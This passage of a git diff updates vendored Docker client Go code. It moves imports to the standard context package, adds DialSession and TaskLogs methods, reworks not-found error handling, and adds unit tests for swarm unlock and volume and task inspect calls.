service.TaskTemplate.ContainerSpec != nil { + if taggedImg := imageWithTagString(service.TaskTemplate.ContainerSpec.Image); taggedImg != "" { + service.TaskTemplate.ContainerSpec.Image = taggedImg + } + if options.QueryRegistry { + var img string + img, imgPlatforms, distErr = imageDigestAndPlatforms(ctx, cli, service.TaskTemplate.ContainerSpec.Image, options.EncodedRegistryAuth) + if img != "" { + service.TaskTemplate.ContainerSpec.Image = img + } + } + } + + // ensure that the image is tagged + if service.TaskTemplate.PluginSpec != nil { + if taggedImg := imageWithTagString(service.TaskTemplate.PluginSpec.Remote); taggedImg != "" { + service.TaskTemplate.PluginSpec.Remote = taggedImg + } + if options.QueryRegistry { + var img string + img, 
imgPlatforms, distErr = imageDigestAndPlatforms(ctx, cli, service.TaskTemplate.PluginSpec.Remote, options.EncodedRegistryAuth) + if img != "" { + service.TaskTemplate.PluginSpec.Remote = img + } + } + } + + if service.TaskTemplate.Placement == nil && len(imgPlatforms) > 0 { + service.TaskTemplate.Placement = &swarm.Placement{} + } + if len(imgPlatforms) > 0 { + service.TaskTemplate.Placement.Platforms = imgPlatforms + } + var response types.ServiceUpdateResponse resp, err := cli.post(ctx, "/services/"+serviceID+"/update", query, service, headers) if err != nil { @@ -36,6 +82,11 @@ func (cli *Client) ServiceUpdate(ctx context.Context, serviceID string, version } err = json.NewDecoder(resp.body).Decode(&response) + + if distErr != nil { + response.Warnings = append(response.Warnings, digestWarning(service.TaskTemplate.ContainerSpec.Image)) + } + ensureReaderClosed(resp) return response, err } diff --git a/vendor/github.com/docker/docker/client/service_update_test.go b/vendor/github.com/docker/docker/client/service_update_test.go index 76bea176bf..9a0a9ce0dd 100644 --- a/vendor/github.com/docker/docker/client/service_update_test.go +++ b/vendor/github.com/docker/docker/client/service_update_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/swarm" ) diff --git a/vendor/github.com/docker/docker/client/session.go b/vendor/github.com/docker/docker/client/session.go new file mode 100644 index 0000000000..c247123b45 --- /dev/null +++ b/vendor/github.com/docker/docker/client/session.go @@ -0,0 +1,18 @@ +package client // import "github.com/docker/docker/client" + +import ( + "context" + "net" + "net/http" +) + +// DialSession returns a connection that can be used communication with daemon +func (cli *Client) DialSession(ctx context.Context, 
proto string, meta map[string][]string) (net.Conn, error) { + req, err := http.NewRequest("POST", "/session", nil) + if err != nil { + return nil, err + } + req = cli.addHeaders(req, meta) + + return cli.setupHijackConn(req, proto) +} diff --git a/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go b/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go index be28d32628..0c50c01a8c 100644 --- a/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go +++ b/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // SwarmGetUnlockKey retrieves the swarm's unlock key. diff --git a/vendor/github.com/docker/docker/client/swarm_get_unlock_key_test.go b/vendor/github.com/docker/docker/client/swarm_get_unlock_key_test.go new file mode 100644 index 0000000000..a1e460c1dc --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_get_unlock_key_test.go @@ -0,0 +1,59 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestSwarmGetUnlockKeyError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.SwarmGetUnlockKey(context.Background()) + assert.Check(t, is.ErrorContains(err, "Error response from daemon: Server error")) +} + +func TestSwarmGetUnlockKey(t *testing.T) { + expectedURL := "/swarm/unlockkey" + unlockKey := "SWMKEY-1-y6guTZNTwpQeTL5RhUfOsdBdXoQjiB2GADHSRJvbXeE" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return 
nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "GET" { + return nil, fmt.Errorf("expected GET method, got %s", req.Method) + } + + key := types.SwarmUnlockKeyResponse{ + UnlockKey: unlockKey, + } + + b, err := json.Marshal(key) + if err != nil { + return nil, err + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + resp, err := client.SwarmGetUnlockKey(context.Background()) + assert.NilError(t, err) + assert.Check(t, is.Equal(unlockKey, resp.UnlockKey)) +} diff --git a/vendor/github.com/docker/docker/client/swarm_init.go b/vendor/github.com/docker/docker/client/swarm_init.go index fd45d066e3..742ca0f041 100644 --- a/vendor/github.com/docker/docker/client/swarm_init.go +++ b/vendor/github.com/docker/docker/client/swarm_init.go @@ -1,13 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) -// SwarmInit initializes the Swarm. +// SwarmInit initializes the swarm. 
func (cli *Client) SwarmInit(ctx context.Context, req swarm.InitRequest) (string, error) { serverResp, err := cli.post(ctx, "/swarm/init", nil, req, nil) if err != nil { diff --git a/vendor/github.com/docker/docker/client/swarm_init_test.go b/vendor/github.com/docker/docker/client/swarm_init_test.go index 811155aff4..1abadc75e9 100644 --- a/vendor/github.com/docker/docker/client/swarm_init_test.go +++ b/vendor/github.com/docker/docker/client/swarm_init_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types/swarm" ) diff --git a/vendor/github.com/docker/docker/client/swarm_inspect.go b/vendor/github.com/docker/docker/client/swarm_inspect.go index 6d95cfc05e..cfaabb25b1 100644 --- a/vendor/github.com/docker/docker/client/swarm_inspect.go +++ b/vendor/github.com/docker/docker/client/swarm_inspect.go @@ -1,13 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) -// SwarmInspect inspects the Swarm. +// SwarmInspect inspects the swarm. 
func (cli *Client) SwarmInspect(ctx context.Context) (swarm.Swarm, error) { serverResp, err := cli.get(ctx, "/swarm", nil, nil) if err != nil { diff --git a/vendor/github.com/docker/docker/client/swarm_inspect_test.go b/vendor/github.com/docker/docker/client/swarm_inspect_test.go index 6432d172b4..954adc94c6 100644 --- a/vendor/github.com/docker/docker/client/swarm_inspect_test.go +++ b/vendor/github.com/docker/docker/client/swarm_inspect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) func TestSwarmInspectError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/swarm_join.go b/vendor/github.com/docker/docker/client/swarm_join.go index cda99930eb..a1cf0455d2 100644 --- a/vendor/github.com/docker/docker/client/swarm_join.go +++ b/vendor/github.com/docker/docker/client/swarm_join.go @@ -1,11 +1,12 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" + "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) -// SwarmJoin joins the Swarm. +// SwarmJoin joins the swarm. 
func (cli *Client) SwarmJoin(ctx context.Context, req swarm.JoinRequest) error { resp, err := cli.post(ctx, "/swarm/join", nil, req, nil) ensureReaderClosed(resp) diff --git a/vendor/github.com/docker/docker/client/swarm_join_test.go b/vendor/github.com/docker/docker/client/swarm_join_test.go index 31ef2a76ee..e67f2bdecf 100644 --- a/vendor/github.com/docker/docker/client/swarm_join_test.go +++ b/vendor/github.com/docker/docker/client/swarm_join_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types/swarm" ) diff --git a/vendor/github.com/docker/docker/client/swarm_leave.go b/vendor/github.com/docker/docker/client/swarm_leave.go index a4df732174..90ca84b363 100644 --- a/vendor/github.com/docker/docker/client/swarm_leave.go +++ b/vendor/github.com/docker/docker/client/swarm_leave.go @@ -1,12 +1,11 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" - - "golang.org/x/net/context" ) -// SwarmLeave leaves the Swarm. +// SwarmLeave leaves the swarm. 
func (cli *Client) SwarmLeave(ctx context.Context, force bool) error { query := url.Values{} if force { diff --git a/vendor/github.com/docker/docker/client/swarm_leave_test.go b/vendor/github.com/docker/docker/client/swarm_leave_test.go index c96dac8120..3dd3711d04 100644 --- a/vendor/github.com/docker/docker/client/swarm_leave_test.go +++ b/vendor/github.com/docker/docker/client/swarm_leave_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestSwarmLeaveError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/swarm_unlock.go b/vendor/github.com/docker/docker/client/swarm_unlock.go index addfb59f0a..d2412f7d44 100644 --- a/vendor/github.com/docker/docker/client/swarm_unlock.go +++ b/vendor/github.com/docker/docker/client/swarm_unlock.go @@ -1,17 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" + "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) -// SwarmUnlock unlockes locked swarm. +// SwarmUnlock unlocks locked swarm. 
func (cli *Client) SwarmUnlock(ctx context.Context, req swarm.UnlockRequest) error { serverResp, err := cli.post(ctx, "/swarm/unlock", nil, req, nil) - if err != nil { - return err - } - ensureReaderClosed(serverResp) return err } diff --git a/vendor/github.com/docker/docker/client/swarm_unlock_test.go b/vendor/github.com/docker/docker/client/swarm_unlock_test.go new file mode 100644 index 0000000000..b3bcc5d922 --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_unlock_test.go @@ -0,0 +1,48 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/swarm" +) + +func TestSwarmUnlockError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.SwarmUnlock(context.Background(), swarm.UnlockRequest{UnlockKey: "SWMKEY-1-y6guTZNTwpQeTL5RhUfOsdBdXoQjiB2GADHSRJvbXeU"}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSwarmUnlock(t *testing.T) { + expectedURL := "/swarm/unlock" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.SwarmUnlock(context.Background(), swarm.UnlockRequest{UnlockKey: "SWMKEY-1-y6guTZNTwpQeTL5RhUfOsdBdXoQjiB2GADHSRJvbXeU"}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/swarm_update.go b/vendor/github.com/docker/docker/client/swarm_update.go index 
cc8eeb6554..56a5bea761 100644 --- a/vendor/github.com/docker/docker/client/swarm_update.go +++ b/vendor/github.com/docker/docker/client/swarm_update.go @@ -1,15 +1,15 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "fmt" "net/url" "strconv" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) -// SwarmUpdate updates the Swarm. +// SwarmUpdate updates the swarm. func (cli *Client) SwarmUpdate(ctx context.Context, version swarm.Version, swarm swarm.Spec, flags swarm.UpdateFlags) error { query := url.Values{} query.Set("version", strconv.FormatUint(version.Index, 10)) diff --git a/vendor/github.com/docker/docker/client/swarm_update_test.go b/vendor/github.com/docker/docker/client/swarm_update_test.go index 3b23db078f..e908bf7860 100644 --- a/vendor/github.com/docker/docker/client/swarm_update_test.go +++ b/vendor/github.com/docker/docker/client/swarm_update_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types/swarm" ) diff --git a/vendor/github.com/docker/docker/client/task_inspect.go b/vendor/github.com/docker/docker/client/task_inspect.go index bc8058fc32..e1c0a736da 100644 --- a/vendor/github.com/docker/docker/client/task_inspect.go +++ b/vendor/github.com/docker/docker/client/task_inspect.go @@ -1,24 +1,22 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "io/ioutil" - "net/http" "github.com/docker/docker/api/types/swarm" - - "golang.org/x/net/context" ) // TaskInspectWithRaw returns the task information and its raw representation.. 
func (cli *Client) TaskInspectWithRaw(ctx context.Context, taskID string) (swarm.Task, []byte, error) { + if taskID == "" { + return swarm.Task{}, nil, objectNotFoundError{object: "task", id: taskID} + } serverResp, err := cli.get(ctx, "/tasks/"+taskID, nil, nil) if err != nil { - if serverResp.statusCode == http.StatusNotFound { - return swarm.Task{}, nil, taskNotFoundError{taskID} - } - return swarm.Task{}, nil, err + return swarm.Task{}, nil, wrapResponseError(err, serverResp, "task", taskID) } defer ensureReaderClosed(serverResp) diff --git a/vendor/github.com/docker/docker/client/task_inspect_test.go b/vendor/github.com/docker/docker/client/task_inspect_test.go index 148cdad3a7..fe5c5bd778 100644 --- a/vendor/github.com/docker/docker/client/task_inspect_test.go +++ b/vendor/github.com/docker/docker/client/task_inspect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,7 @@ import ( "testing" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" + "github.com/pkg/errors" ) func TestTaskInspectError(t *testing.T) { @@ -24,6 +25,18 @@ func TestTaskInspectError(t *testing.T) { } } +func TestTaskInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := client.TaskInspectWithRaw(context.Background(), "") + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) + } +} + func TestTaskInspect(t *testing.T) { expectedURL := "/tasks/task_id" client := &Client{ diff --git a/vendor/github.com/docker/docker/client/task_list.go b/vendor/github.com/docker/docker/client/task_list.go index 66324da959..42d20c1b8d 100644 --- a/vendor/github.com/docker/docker/client/task_list.go +++ b/vendor/github.com/docker/docker/client/task_list.go @@ -1,13 +1,13 @@ -package client 
+package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // TaskList returns the list of tasks. @@ -15,7 +15,7 @@ func (cli *Client) TaskList(ctx context.Context, options types.TaskListOptions) query := url.Values{} if options.Filters.Len() > 0 { - filterJSON, err := filters.ToParam(options.Filters) + filterJSON, err := filters.ToJSON(options.Filters) if err != nil { return nil, err } diff --git a/vendor/github.com/docker/docker/client/task_list_test.go b/vendor/github.com/docker/docker/client/task_list_test.go index 2a9a4c4346..16d0edaa0a 100644 --- a/vendor/github.com/docker/docker/client/task_list_test.go +++ b/vendor/github.com/docker/docker/client/task_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -12,7 +13,6 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) func TestTaskListError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/task_logs.go b/vendor/github.com/docker/docker/client/task_logs.go new file mode 100644 index 0000000000..6222fab577 --- /dev/null +++ b/vendor/github.com/docker/docker/client/task_logs.go @@ -0,0 +1,51 @@ +package client // import "github.com/docker/docker/client" + +import ( + "context" + "io" + "net/url" + "time" + + "github.com/docker/docker/api/types" + timetypes "github.com/docker/docker/api/types/time" +) + +// TaskLogs returns the logs generated by a task in an io.ReadCloser. +// It's up to the caller to close the stream. 
+func (cli *Client) TaskLogs(ctx context.Context, taskID string, options types.ContainerLogsOptions) (io.ReadCloser, error) { + query := url.Values{} + if options.ShowStdout { + query.Set("stdout", "1") + } + + if options.ShowStderr { + query.Set("stderr", "1") + } + + if options.Since != "" { + ts, err := timetypes.GetTimestamp(options.Since, time.Now()) + if err != nil { + return nil, err + } + query.Set("since", ts) + } + + if options.Timestamps { + query.Set("timestamps", "1") + } + + if options.Details { + query.Set("details", "1") + } + + if options.Follow { + query.Set("follow", "1") + } + query.Set("tail", options.Tail) + + resp, err := cli.get(ctx, "/tasks/"+taskID+"/logs", query, nil) + if err != nil { + return nil, err + } + return resp.body, nil +} diff --git a/vendor/github.com/docker/docker/client/transport.go b/vendor/github.com/docker/docker/client/transport.go index f04e601649..5541344366 100644 --- a/vendor/github.com/docker/docker/client/transport.go +++ b/vendor/github.com/docker/docker/client/transport.go @@ -1,22 +1,11 @@ -package client +package client // import "github.com/docker/docker/client" import ( "crypto/tls" - "errors" "net/http" ) -var errTLSConfigUnavailable = errors.New("TLSConfig unavailable") - -// transportFunc allows us to inject a mock transport for testing. We define it -// here so we can detect the tlsconfig and return nil for only this type. -type transportFunc func(*http.Request) (*http.Response, error) - -func (tf transportFunc) RoundTrip(req *http.Request) (*http.Response, error) { - return tf(req) -} - -// resolveTLSConfig attempts to resolve the tls configuration from the +// resolveTLSConfig attempts to resolve the TLS configuration from the // RoundTripper. 
func resolveTLSConfig(transport http.RoundTripper) *tls.Config { switch tr := transport.(type) { diff --git a/vendor/github.com/docker/docker/client/utils.go b/vendor/github.com/docker/docker/client/utils.go index 23d520ecb8..7f3ff44eb8 100644 --- a/vendor/github.com/docker/docker/client/utils.go +++ b/vendor/github.com/docker/docker/client/utils.go @@ -1,9 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( - "github.com/docker/docker/api/types/filters" "net/url" "regexp" + + "github.com/docker/docker/api/types/filters" ) var headerRegexp = regexp.MustCompile(`\ADocker/.+\s\((.+)\)\z`) @@ -23,7 +24,7 @@ func getDockerOS(serverHeader string) string { func getFiltersQuery(f filters.Args) (url.Values, error) { query := url.Values{} if f.Len() > 0 { - filterJSON, err := filters.ToParam(f) + filterJSON, err := filters.ToJSON(f) if err != nil { return query, err } diff --git a/vendor/github.com/docker/docker/client/version.go b/vendor/github.com/docker/docker/client/version.go index 933ceb4a49..1989f6d6d2 100644 --- a/vendor/github.com/docker/docker/client/version.go +++ b/vendor/github.com/docker/docker/client/version.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // ServerVersion returns information of the docker client and server host. 
diff --git a/vendor/github.com/docker/docker/client/volume_create.go b/vendor/github.com/docker/docker/client/volume_create.go index 9620c87cbf..f1f6fcdc4a 100644 --- a/vendor/github.com/docker/docker/client/volume_create.go +++ b/vendor/github.com/docker/docker/client/volume_create.go @@ -1,15 +1,15 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "github.com/docker/docker/api/types" volumetypes "github.com/docker/docker/api/types/volume" - "golang.org/x/net/context" ) // VolumeCreate creates a volume in the docker host. -func (cli *Client) VolumeCreate(ctx context.Context, options volumetypes.VolumesCreateBody) (types.Volume, error) { +func (cli *Client) VolumeCreate(ctx context.Context, options volumetypes.VolumeCreateBody) (types.Volume, error) { var volume types.Volume resp, err := cli.post(ctx, "/volumes/create", nil, options, nil) if err != nil { diff --git a/vendor/github.com/docker/docker/client/volume_create_test.go b/vendor/github.com/docker/docker/client/volume_create_test.go index 9f1b2540b5..cfab191845 100644 --- a/vendor/github.com/docker/docker/client/volume_create_test.go +++ b/vendor/github.com/docker/docker/client/volume_create_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -11,7 +12,6 @@ import ( "github.com/docker/docker/api/types" volumetypes "github.com/docker/docker/api/types/volume" - "golang.org/x/net/context" ) func TestVolumeCreateError(t *testing.T) { @@ -19,7 +19,7 @@ func TestVolumeCreateError(t *testing.T) { client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } - _, err := client.VolumeCreate(context.Background(), volumetypes.VolumesCreateBody{}) + _, err := client.VolumeCreate(context.Background(), volumetypes.VolumeCreateBody{}) if err == nil || err.Error() != "Error response from daemon: Server error" { 
t.Fatalf("expected a Server Error, got %v", err) } @@ -53,7 +53,7 @@ func TestVolumeCreate(t *testing.T) { }), } - volume, err := client.VolumeCreate(context.Background(), volumetypes.VolumesCreateBody{ + volume, err := client.VolumeCreate(context.Background(), volumetypes.VolumeCreateBody{ Name: "myvolume", Driver: "mydriver", DriverOpts: map[string]string{ diff --git a/vendor/github.com/docker/docker/client/volume_inspect.go b/vendor/github.com/docker/docker/client/volume_inspect.go index 3860e9b22c..f840682d2e 100644 --- a/vendor/github.com/docker/docker/client/volume_inspect.go +++ b/vendor/github.com/docker/docker/client/volume_inspect.go @@ -1,13 +1,12 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "io/ioutil" - "net/http" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // VolumeInspect returns the information about a specific volume in the docker host. @@ -18,13 +17,14 @@ func (cli *Client) VolumeInspect(ctx context.Context, volumeID string) (types.Vo // VolumeInspectWithRaw returns the information about a specific volume in the docker host and its raw representation func (cli *Client) VolumeInspectWithRaw(ctx context.Context, volumeID string) (types.Volume, []byte, error) { + if volumeID == "" { + return types.Volume{}, nil, objectNotFoundError{object: "volume", id: volumeID} + } + var volume types.Volume resp, err := cli.get(ctx, "/volumes/"+volumeID, nil, nil) if err != nil { - if resp.statusCode == http.StatusNotFound { - return volume, nil, volumeNotFoundError{volumeID} - } - return volume, nil, err + return volume, nil, wrapResponseError(err, resp, "volume", volumeID) } defer ensureReaderClosed(resp) diff --git a/vendor/github.com/docker/docker/client/volume_inspect_test.go b/vendor/github.com/docker/docker/client/volume_inspect_test.go index 0d1d118828..04f00129b7 100644 --- a/vendor/github.com/docker/docker/client/volume_inspect_test.go +++ 
b/vendor/github.com/docker/docker/client/volume_inspect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,9 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/pkg/errors" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestVolumeInspectError(t *testing.T) { @@ -19,9 +22,7 @@ func TestVolumeInspectError(t *testing.T) { } _, err := client.VolumeInspect(context.Background(), "nothing") - if err == nil || err.Error() != "Error response from daemon: Server error" { - t.Fatalf("expected a Server Error, got %v", err) - } + assert.Check(t, is.ErrorContains(err, "Error response from daemon: Server error")) } func TestVolumeInspectNotFound(t *testing.T) { @@ -30,13 +31,29 @@ func TestVolumeInspectNotFound(t *testing.T) { } _, err := client.VolumeInspect(context.Background(), "unknown") - if err == nil || !IsErrVolumeNotFound(err) { - t.Fatalf("expected a volumeNotFound error, got %v", err) + assert.Check(t, IsErrNotFound(err)) +} + +func TestVolumeInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := client.VolumeInspectWithRaw(context.Background(), "") + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) } } func TestVolumeInspect(t *testing.T) { expectedURL := "/volumes/volume_id" + expected := types.Volume{ + Name: "name", + Driver: "driver", + Mountpoint: "mountpoint", + } + client := &Client{ client: newMockClient(func(req *http.Request) (*http.Response, error) { if !strings.HasPrefix(req.URL.Path, expectedURL) { @@ -45,11 +62,7 @@ func TestVolumeInspect(t *testing.T) { if req.Method != "GET" { return nil, fmt.Errorf("expected GET method, got %s", req.Method) } - content, err := json.Marshal(types.Volume{ - 
Name: "name", - Driver: "driver", - Mountpoint: "mountpoint", - }) + content, err := json.Marshal(expected) if err != nil { return nil, err } @@ -60,17 +73,7 @@ func TestVolumeInspect(t *testing.T) { }), } - v, err := client.VolumeInspect(context.Background(), "volume_id") - if err != nil { - t.Fatal(err) - } - if v.Name != "name" { - t.Fatalf("expected `name`, got %s", v.Name) - } - if v.Driver != "driver" { - t.Fatalf("expected `driver`, got %s", v.Driver) - } - if v.Mountpoint != "mountpoint" { - t.Fatalf("expected `mountpoint`, got %s", v.Mountpoint) - } + volume, err := client.VolumeInspect(context.Background(), "volume_id") + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(expected, volume)) } diff --git a/vendor/github.com/docker/docker/client/volume_list.go b/vendor/github.com/docker/docker/client/volume_list.go index 32247ce115..284554d67c 100644 --- a/vendor/github.com/docker/docker/client/volume_list.go +++ b/vendor/github.com/docker/docker/client/volume_list.go @@ -1,17 +1,17 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "github.com/docker/docker/api/types/filters" volumetypes "github.com/docker/docker/api/types/volume" - "golang.org/x/net/context" ) // VolumeList returns the volumes configured in the docker host. 
-func (cli *Client) VolumeList(ctx context.Context, filter filters.Args) (volumetypes.VolumesListOKBody, error) { - var volumes volumetypes.VolumesListOKBody +func (cli *Client) VolumeList(ctx context.Context, filter filters.Args) (volumetypes.VolumeListOKBody, error) { + var volumes volumetypes.VolumeListOKBody query := url.Values{} if filter.Len() > 0 { diff --git a/vendor/github.com/docker/docker/client/volume_list_test.go b/vendor/github.com/docker/docker/client/volume_list_test.go index f29639be23..2a83823f7e 100644 --- a/vendor/github.com/docker/docker/client/volume_list_test.go +++ b/vendor/github.com/docker/docker/client/volume_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -12,7 +13,6 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" volumetypes "github.com/docker/docker/api/types/volume" - "golang.org/x/net/context" ) func TestVolumeListError(t *testing.T) { @@ -69,7 +69,7 @@ func TestVolumeList(t *testing.T) { if actualFilters != listCase.expectedFilters { return nil, fmt.Errorf("filters not set in URL query properly. 
Expected '%s', got %s", listCase.expectedFilters, actualFilters) } - content, err := json.Marshal(volumetypes.VolumesListOKBody{ + content, err := json.Marshal(volumetypes.VolumeListOKBody{ Volumes: []*types.Volume{ { Name: "volume", diff --git a/vendor/github.com/docker/docker/client/volume_prune.go b/vendor/github.com/docker/docker/client/volume_prune.go index a07e4ce637..70041efed8 100644 --- a/vendor/github.com/docker/docker/client/volume_prune.go +++ b/vendor/github.com/docker/docker/client/volume_prune.go @@ -1,12 +1,12 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "fmt" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "golang.org/x/net/context" ) // VolumesPrune requests the daemon to delete unused data @@ -29,7 +29,7 @@ func (cli *Client) VolumesPrune(ctx context.Context, pruneFilters filters.Args) defer ensureReaderClosed(serverResp) if err := json.NewDecoder(serverResp.body).Decode(&report); err != nil { - return report, fmt.Errorf("Error retrieving disk usage: %v", err) + return report, fmt.Errorf("Error retrieving volume prune report: %v", err) } return report, nil diff --git a/vendor/github.com/docker/docker/client/volume_remove.go b/vendor/github.com/docker/docker/client/volume_remove.go index 6c26575b49..fc5a71d334 100644 --- a/vendor/github.com/docker/docker/client/volume_remove.go +++ b/vendor/github.com/docker/docker/client/volume_remove.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "github.com/docker/docker/api/types/versions" - "golang.org/x/net/context" ) // VolumeRemove removes a volume from the docker host. 
@@ -17,5 +17,5 @@ func (cli *Client) VolumeRemove(ctx context.Context, volumeID string, force bool } resp, err := cli.delete(ctx, "/volumes/"+volumeID, query, nil) ensureReaderClosed(resp) - return err + return wrapResponseError(err, resp, "volume", volumeID) } diff --git a/vendor/github.com/docker/docker/client/volume_remove_test.go b/vendor/github.com/docker/docker/client/volume_remove_test.go index 1fe657349a..31fb3d71aa 100644 --- a/vendor/github.com/docker/docker/client/volume_remove_test.go +++ b/vendor/github.com/docker/docker/client/volume_remove_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestVolumeRemoveError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_none.go b/vendor/github.com/docker/docker/cmd/docker/daemon_none.go deleted file mode 100644 index 65f9f37be2..0000000000 --- a/vendor/github.com/docker/docker/cmd/docker/daemon_none.go +++ /dev/null @@ -1,27 +0,0 @@ -// +build !daemon - -package main - -import ( - "fmt" - "runtime" - "strings" - - "github.com/spf13/cobra" -) - -func 